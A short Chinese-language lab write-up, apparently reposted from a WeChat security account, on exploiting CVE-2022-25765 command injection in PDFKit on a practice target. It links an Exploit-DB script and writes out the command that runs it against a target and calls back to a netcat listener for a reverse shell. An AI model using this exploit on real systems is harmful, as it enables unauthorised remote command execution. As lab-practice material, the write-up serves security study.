“ 命令执行”
01
—
CVE-2022-25765
今天打靶机的时候,遇到一个站点,功能是可以把网页转化为PDF的站点,尝试包含/etc/passwd的时候报错了:
根据PDFKit搜索EXP,发现了一个命令执行的EXP
link:https:
//www.exploit-db.com/exploits/51293
python3 CVE
-2022
–
25765.
py -s you_kali_nc_listen
80
-w http:
//192.168.x.x:3000/ -p pdf
将payload进行URL编码,放到BP里面重放攻击,然后kali监听80端口:
突破边界:
原文始发于微信公众号(道玄网安驿站):CVE-2022–25765-PDFKit命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论